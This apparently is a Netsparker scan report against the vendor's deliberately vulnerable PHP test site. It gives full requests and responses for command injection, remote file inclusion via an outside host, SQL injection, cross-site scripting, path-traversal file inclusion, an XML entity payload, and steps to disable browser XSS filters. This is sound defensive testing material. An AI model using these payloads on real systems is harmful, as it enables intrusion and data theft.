There are 35 more vulnerabilities that are not shown below. Please take a look at the detailed scan report to see them.
Netsparker identified a Command Injection, which occurs when input data is interpreted as an operating system command.
This is a highly critical issue and should be addressed as soon as possible.
Method | Parameter | Value |
---|---|---|
POST | param | '& SET /A 0xFFF9999-94368 & |
ip-ac1e000bpacheuser
Microsoft Windows [Version 6.1.7601]
Image Name PID Session Name Session# Mem Usage ========================= ======== ================ =========== ============ System Idle Process 0 0 24 K System 4 0 300 K smss.exe 268 0 1,200 K csrss.exe 340 0 4,680 K wininit.exe 392 0 4,344 K csrss.exe 400 1 3,824 K winlogon.exe 428 1 4,184 K services.exe 488 0 8,208 K lsass.exe 496 0 11,760 K lsm.exe 504 0 5,436 K svchost.exe 600 0 8,732 K nvvsvc.exe 664 0 6,612 K nvwmi64.exe 688 0 3,956 K nvSCPAPISvr.exe 712 0 5,636 K svchost.exe 756 0 7,192 K LogonUI.exe 836 1 14,268 K svchost.exe 844 0 12,840 K svchost.exe 900 0 35,228 K svchost.exe 952 0 10,580 K svchost.exe 1004 0 5,580 K svchost.exe 288 0 15,788 K svchost.exe 332 0 11,848 K spoolsv.exe 1144 0 10,876 K nvxdsync.exe 1160 1 12,468 K nvwmi64.exe 1196 1 8,008 K svchost.exe 1356 0 9,148 K inetinfo.exe 1380 0 13,008 K sqlservr.exe 1448 0 13,768 K mysqld-nt.exe 1520 0 8,668 K svchost.exe 1576 0 2,736 K sqlbrowser.exe 1860 0 4,216 K sqlwriter.exe 1928 0 6,088 K XenGuestAgent.exe 2020 0 38,716 K Ec2Config.exe 2072 0 52,624 K WmiPrvSE.exe 2244 0 7,248 K WmiPrvSE.exe 2484 0 20,308 K svchost.exe 2572 0 6,340 K svchost.exe 2624 0 5,548 K VSSVC.exe 2784 0 6,468 K XenDpriv.exe 2912 0 19,536 K msdtc.exe 2208 0 7,336 K GoogleCrashHandler.exe 880 0 992 K GoogleCrashHandler64.exe 1432 0 808 K httpd.exe 2832 0 16,764 K httpd.exe 540 0 73,168 K cmd.exe 1732 0 3,368 K conhost.exe 1772 0 2,676 K PING.EXE 2432 0 3,472 K cmd.exe 1816 0 3,424 K conhost.exe 2612 0 2,688 K nslookup.exe 2180 0 4,032 K cmd.exe 1812 0 3,396 K conhost.exe 948 0 2,680 K tasklist.exe 2428 0 5,284 K cmd.exe 2464 0 124 K
POST /nslookup.php HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/nslookup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
param=%27%26+SET+%2fA+0xFFF9999-94368+%26
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Connection: Keep-Alive
Keep-Alive: timeout=5, max=143
Content-Length: 4032
Content-Type: text/html
Date: Mon, 13 Jul 20
…<td class="style1" colspan="2">
</td>
</tr>
</table>
</form>
<pre>Server: ip-172-30-0-2.ec2.internal
Address: 172.30.0.2
268314873</pre> </p>
</div>
</div>
<div style="clear: both;"> </div>
</div>
<!-- end #content -->
<div id="sidebar">
<ul>
<li>
<div id="search" >
<form
…
WASC | 31 |
CVSS 3.0 SCORE | |
---|---|
Base | 10 (Critical) |
Temporal | 10 (Critical) |
Environmental | 10 (Critical) |
CVSS Vector String |
---|
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
CVSS 3.1 SCORE | |
---|---|
Base | 10 (Critical) |
Temporal | 10 (Critical) |
Environmental | 10 (Critical) |
CVSS Vector String |
---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
Netsparker identified a Remote File Inclusion vulnerability on the target web application.
This occurs when a file from any location can be injected into the attacked page and included as source code for parsing and execution.
Method | Parameter | Value |
---|---|---|
GET | file | http://r87.com/n?%00.nsp |
ip-ac1e000b\apacheuser
Microsoft Windows [Version 6.1.7601]
User accounts for \\IP-AC1E000B ------------------------------------------------------------------------------- Administrator ApacheUser Guest MY OY The command completed successfully.
Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator MY OY The command completed successfully.
Image Name PID Session Name Session# Mem Usage ========================= ======== ================ =========== ============ System Idle Process 0 0 24 K System 4 0 300 K smss.exe 268 0 1,200 K csrss.exe 340 0 4,652 K wininit.exe 392 0 4,344 K csrss.exe 400 1 3,824 K winlogon.exe 428 1 4,184 K services.exe 488 0 8,320 K lsass.exe 496 0 11,760 K lsm.exe 504 0 5,436 K svchost.exe 600 0 8,732 K nvvsvc.exe 664 0 6,612 K nvwmi64.exe 688 0 3,956 K nvSCPAPISvr.exe 712 0 5,636 K svchost.exe 756 0 7,184 K LogonUI.exe 836 1 14,268 K svchost.exe 844 0 12,844 K svchost.exe 900 0 35,204 K svchost.exe 952 0 10,588 K svchost.exe 1004 0 5,580 K svchost.exe 288 0 15,852 K svchost.exe 332 0 11,904 K spoolsv.exe 1144 0 10,892 K nvxdsync.exe 1160 1 12,468 K nvwmi64.exe 1196 1 8,008 K svchost.exe 1356 0 9,144 K inetinfo.exe 1380 0 13,024 K sqlservr.exe 1448 0 13,784 K mysqld-nt.exe 1520 0 8,460 K svchost.exe 1576 0 2,736 K sqlbrowser.exe 1860 0 4,216 K sqlwriter.exe 1928 0 6,088 K XenGuestAgent.exe 2020 0 38,712 K Ec2Config.exe 2072 0 52,572 K WmiPrvSE.exe 2244 0 7,248 K WmiPrvSE.exe 2484 0 20,176 K svchost.exe 2572 0 6,340 K svchost.exe 2624 0 5,548 K VSSVC.exe 2784 0 6,468 K XenDpriv.exe 2912 0 19,536 K msdtc.exe 2208 0 7,336 K GoogleCrashHandler.exe 880 0 992 K GoogleCrashHandler64.exe 1432 0 808 K httpd.exe 2832 0 16,764 K httpd.exe 540 0 70,680 K cmd.exe 1340 0 3,360 K conhost.exe 1344 0 2,684 K tasklist.exe 3032 0 5,292 K
GET /process.php?file=http%3a%2f%2fr87.com%2fn%3f%00.nsp HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 1490
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:05:10 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Netsparker Test Web Site - PHP</title>
<link href="/style.css" rel="stylesheet" type="text/css" media="screen" />
</head><body>
<div id="wrapper">
<div id="menu">
<ul>
<li><a href="/process.php?file=Generics/index.nsp">Home</a></li>
<li><a href="/hello.php?name=Visitor">Hello</a></li>
<li><a href="/products.php?pro=url">Products</a></li>
<li><a href="/process.php?file=Generics/about.nsp">About</a></li>
<li><a href="/process.php?file=Generics/contact.nsp">Contact</a></li>
<li><a href="/auth/">Login</a></li>
</ul>
</div>
<!-- end #menu -->
<div id="header">
</div>
<!-- end #header --> NETSPARKER_F0M1-44353702950-<script>netsparkerRFI(0x066666)</script> <!-- process.php load pages from path of the website. -->
<!-- FIXME: File / directory permissions -->
<!-- end #page -->
</div>
<div id="resetbar">
This website is automatically reset at every midnight (00:00 - UTC).
</div>
<div id="footer">
<p>Copyright (c) 2010 testsparker.com. All rights reserved. Design by <a href="http://www.freecsstemplates.org/">Free CSS Templates</a>.</p>
</div> <!-- end #footer -->
</body>
</html>
WASC | 5 |
CVSS 3.0 SCORE | |
---|---|
Base | 10 (Critical) |
Temporal | 10 (Critical) |
Environmental | 10 (Critical) |
CVSS Vector String |
---|
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N |
CVSS 3.1 SCORE | |
---|---|
Base | 10 (Critical) |
Temporal | 10 (Critical) |
Environmental | 10 (Critical) |
CVSS Vector String |
---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N |
Netsparker identified a Boolean-Based SQL Injection, which occurs when data input by a user is interpreted as a SQL command rather than as normal data by the backend database.
This is an extremely common vulnerability and its successful exploitation can have critical implications.
Netsparker confirmedthe vulnerability by executing a test SQL query on the backend database. In these tests, SQL injection was not obvious, but the different responses from the page based on the injection test allowed Netsparker to identify and confirm the SQL injection.
Method | Parameter | Value |
---|---|---|
GET | id | -1 OR 17-7=10 |
5.0.51b-community-nt-log
root@localhost
sqlibench
GET /artist.php?id=-1%20OR%2017-7%3d10 HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/process.php?file=Generics/index.nsp
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Connection: Keep-Alive
Keep-Alive: timeout=5, max=37
Content-Type: text/html
Transfer-Encoding: chunked
Date: Mon, 13 Jul 2020 07:06:31 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Netsparker Test Web Site - PHP</title>
<link href="/style.css" rel="stylesheet" type="text/css" media="screen" />
</head><link type="text/css" href="/Generics/style.css" rel="stylesheet"/>
<body>
<div id="wrapper">
<div id="menu">
<ul>
<li><a href="/process.php?file=Generics/index.nsp">Home</a></li>
<li><a href="/hello.php?name=Visitor">Hello</a></li>
<li><a href="/products.php?pro=url">Products</a></li>
<li><a href="/process.php?file=Generics/about.nsp">About</a></li>
<li><a href="/process.php?file=Generics/contact.nsp">Contact</a></li>
<li><a href="/auth/">Login</a></li>
</ul>
</div>
<!-- end #menu -->
<div id="header">
</div>
<!-- end #header --> <div id="page">
<div id="page-bgtop">
<div id="page-bgbtm">
<div id="content">
<div class="post">
<h2 class="title"><a href="artist.php#">Artist Service</a></h2>
<div style="clear: both;"> </div>
<div class="entry">
<p>
<h3>Results: -1 OR 17-7=10</h3></br>
<table class="container"><thead><th>ID</th><th>Name</th><th>SURNAME</th><th>CREATION DATE </th></thead><tbody><tr class="odd">
<td>2 </td>
<td>NICK </td>
<td>WAHLBERG </td>
<td>2006-02-15 04:34:33 </td>
<td> </td>
</tr>
<tr class="even">
<td>3 </td>
<td>ED </td>
<td>CHASE </td>
<td>2006-02-15 04:34:33 </td>
<td> </td>
</tr>
<tr class="odd">
<td>4 </td>
<td>JENNIFER </td>
<td>DAVIS </td>
<td>2006-02-15 04:34:
…
WASC | 19 |
CVSS 3.0 SCORE | |
---|---|
Base | 10 (Critical) |
Temporal | 10 (Critical) |
Environmental | 10 (Critical) |
CVSS Vector String |
---|
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
CVSS 3.1 SCORE | |
---|---|
Base | 10 (Critical) |
Temporal | 10 (Critical) |
Environmental | 10 (Critical) |
CVSS Vector String |
---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
Netsparker detected Cross-site Scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.
Method | Parameter | Value |
---|---|---|
GET | id | <scRipt>netsparker(0x000870)</scRipt> |
GET /artist.php?id=%3cscRipt%3enetsparker(0x000870)%3c%2fscRipt%3e HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/process.php?file=Generics/index.nsp
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 2974
Content-Type: text/html
Date: Mon, 13 Jul 20
…class="post">
<h2 class="title"><a href="artist.php#">Artist Service</a></h2>
<div style="clear: both;"> </div>
<div class="entry">
<p>
<h3>Results: <scRipt>netsparker(0x000870)</scRipt></h3></br>
no rows returned
</p>
</div>
</div>
<div style="clear: both;"> </div>
</div>
<!-- end #content -->
<div id="sidebar">
<ul>
…
Method | Parameter | Value |
---|---|---|
GET | name | <scRipt>netsparker(0x000290)</scRipt> |
GET /hello.php?name=%3cscRipt%3enetsparker(0x000290)%3c%2fscRipt%3e HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/process.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 3018
Content-Type: text/html
Date: Mon, 13 Jul 20
…/a></h1>
<p>
Hello Visitor<br />
<b>Parse error</b>: syntax error, unexpected '>' in <b>C:\AppServ\www\hello.php(24) : eval()'d code</b> on line <b>1</b><br />
20$str = 20 <scRipt>netsparker(0x000290)</scRipt>;20 </p>
<div style="clear: both;"> </div>
<div class="entry">
</div>
</div>
<div style="clear: both;"> </div>
</div>
<!-- end #content -
…
Method | Parameter | Value |
---|---|---|
GET | pro | '"--></style></scRipt><scRipt>netsparker(0x0005EE)</scRipt> |
GET /products.php?pro='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x0005EE)%3C/scRipt%3E HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/process.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 2868
Content-Type: text/html
Date: Mon, 13 Jul 20
…t="text/html; charset=utf-8" />
<title>Netsparker Test Web Site - PHP</title>
<link href="/style.css" rel="stylesheet" type="text/css" media="screen" />
</head><script type=text/javascript src = "'"--></style></scRipt><scRipt>netsparker(0x0005EE)</scRipt>" ></script>
<body>
<div id="wrapper">
<div id="menu">
<ul>
<li><a href="/process.php?file=Generics/index.nsp">Home</a></li>
<li><a href="/hello.php?name=Visitor">Hello</a></li>
<
…
The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes in to a JavaScript block within the HTML document, then output needs to be encoded accordingly. Encoding can get very complex, therefore it's strongly recommended to use an encoding library such asOWASP ESAPIandMicrosoft Anti-cross-site scripting.
Additionally, you should implement a strong Content Security Policy (CSP) as a defense-in-depth measure if an XSS vulnerability is mistakenly introduced. Due to the complexity of XSS-Prevention and the lack of secure standard behavior in programming languages and frameworks, XSS vulnerabilities are still common in web applications.
CSP will act as a safeguard that can prevent an attacker from successfully exploiting Cross-site Scripting vulnerabilities in your website and is advised in any kind of application. Please make sure to scan your application again with Content Security Policy checks enabled after implementing CSP, in order to avoid common mistakes that can impact the effectiveness of your policy. There are a few pitfalls that can render your CSP policy useless and we highly recommend reading the resources linked in the reference section before you start to implement one.
Generated XSS exploit might not work due to browser XSS filtering. Please follow the guidelines below in order to disable XSS filtering for different browsers. Also note that;
Chrome
chrome.exe --args --disable-xss-auditor
Internet Explorer
Firefox
about:config
in the URL address bar.false
by double clicking the row.Safari
defaults write com.apple.Safari "com.apple.Safari.ContentPageGroupIdentifier.WebKit2XSSAuditorEnabled" -bool FALSE
defaults write com.apple.Safari "com.apple.Safari.ContentPageGroupIdentifier.WebKit2XSSAuditorEnabled" -bool TRUE
WASC | 8 |
CVSS 3.0 SCORE | |
---|---|
Base | 7.4 (High) |
Temporal | 7.4 (High) |
Environmental | 7.4 (High) |
CVSS Vector String |
---|
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N |
CVSS 3.1 SCORE | |
---|---|
Base | 7.4 (High) |
Temporal | 7.4 (High) |
Environmental | 7.4 (High) |
CVSS Vector String |
---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N |
Netsparker identified a Local File Inclusion vulnerability, which occurs when a file from the target system is injected into the attacked server page.
Netsparker confirmedthis issue by reading some files from the target web server.
"/etc/passwd"
file"/apache/logs/error.log"
or "/apache/logs/access.log"
Method | Parameter | Value |
---|---|---|
GET | file | /../../../../../../../../../../windows/win.ini%00.nsp |
; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail]
GET /process.php?file=%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00.nsp HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 1514
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:05:20 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Netsparker Test Web Site - PHP</title>
<link href="/style.css" rel="stylesheet" type="text/css" media="screen" />
</head><body>
<div id="wrapper">
<div id="menu">
<ul>
<li><a href="/process.php?file=Generics/index.nsp">Home</a></li>
<li><a href="/hello.php?name=Visitor">Hello</a></li>
<li><a href="/products.php?pro=url">Products</a></li>
<li><a href="/process.php?file=Generics/about.nsp">About</a></li>
<li><a href="/process.php?file=Generics/contact.nsp">Contact</a></li>
<li><a href="/auth/">Login</a></li>
</ul>
</div>
<!-- end #menu -->
<div id="header">
</div>
<!-- end #header --> ; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
<!-- process.php load pages from path of the website. -->
<!-- FIXME: File / directory permissions -->
<!-- end #page -->
</div>
<div id="resetbar">
This website is automatically reset at every midnight (00:00 - UTC).
</div>
<div id="footer">
<p>Copyright (c) 2010 testsparker.com. All rights reserved. Design by <a href="http://www.freecsstemplates.org/">Free CSS Templates</a>.</p>
</div> <!-- end #footer -->
</body>
</html>
WASC | 33 |
CVSS 3.0 SCORE | |
---|---|
Base | 8.6 (High) |
Temporal | 8.6 (High) |
Environmental | 8.6 (High) |
CVSS Vector String |
---|
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N |
CVSS 3.1 SCORE | |
---|---|
Base | 8.6 (High) |
Temporal | 8.6 (High) |
Environmental | 8.6 (High) |
CVSS Vector String |
---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N |
Netsparker detected that password data is being transmitted over HTTP.
Method | Parameter | Value |
---|---|---|
GET | User-Agent | (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) |
GET /auth/ HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/process.php?file=Generics/index.nsp
User-Agent: (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=4
Content-Length: 3162
Connection: Keep-Alive
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:06:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check
…Enter your credentials (admin / admin123456)
<br/>
<form method="POST" action="control.php">
Username: <input type="text" name="username"/>
<br/>
Password: <input type="password" name="password"/password" name="password"/>
<!-- Test credentials -->
<!-- Password: admin123456 -->
<br/>
<input type="hidden" name="token" value="23577">
<br/>
<input type="submit" value="SUBMIT"
…
Method | Parameter | Value |
---|---|---|
POST | username | %27 |
POST | token | 30556 |
POST | password |
POST /auth/control.php HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/auth/login.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
username=%2527&token=30556&password=
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=27
Content-Length: 3162
Connection: Keep-Alive
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:07:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check
…Enter your credentials (admin / admin123456)
<br/>
<form method="POST" action="control.php">
Username: <input type="text" name="username"/>
<br/>
Password: <input type="password" name="password"/password" name="password"/>
<!-- Test credentials -->
<!-- Password: admin123456 -->
<br/>
<input type="hidden" name="token" value="26775">
<br/>
<input type="submit" value="SUBMIT"
…
Method | Parameter | Value |
---|---|---|
GET | User-Agent | (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) |
GET /auth/control.php HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/auth/login.php
User-Agent: (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=40
Content-Length: 3162
Connection: Keep-Alive
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:08:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check
…Enter your credentials (admin / admin123456)
<br/>
<form method="POST" action="control.php">
Username: <input type="text" name="username"/>
<br/>
Password: <input type="password" name="password"/password" name="password"/>
<!-- Test credentials -->
<!-- Password: admin123456 -->
<br/>
<input type="hidden" name="token" value="18806">
<br/>
<input type="submit" value="SUBMIT"
…
GET /auth/login.php HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://php.testsparker.com/auth/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Set-Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7; path=/
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Content-Length: 3161
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:04:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check
…Enter your credentials (admin / admin123456)
<br/>
<form method="POST" action="control.php">
Username: <input type="text" name="username"/>
<br/>
Password: <input type="password" name="password"/>
<!-- Test credentials -->
<!-- Password: admin123456 -->
<br/>
<input type="hidden" name="token" value="2544">
<br/>
<input type="submit" value="SUBMIT">
</form>
…
POST /auth/login.php HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Content-Length: 124
Content-Type: application/xml
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/auth/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
<?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "data:;base64,TlM3NzU0NTYxNDQ2NTc1">]><ns>&lfi;</ns>
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=99
Content-Length: 3162
Connection: Keep-Alive
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:06:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check
…Enter your credentials (admin / admin123456)
<br/>
<form method="POST" action="control.php">
Username: <input type="text" name="username"/>
<br/>
Password: <input type="password" name="password"/password" name="password"/>
<!-- Test credentials -->
<!-- Password: admin123456 -->
<br/>
<input type="hidden" name="token" value="14285">
<br/>
<input type="submit" value="SUBMIT"
…
Method | Parameter | Value |
---|---|---|
GET | URI-BASED | /'"--></style></scRipt><scRipt>netsparker(0x000CA2)</scRipt> |
GET /auth/login.php/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x000CA2)%3C/scRipt%3E HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/auth/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=47
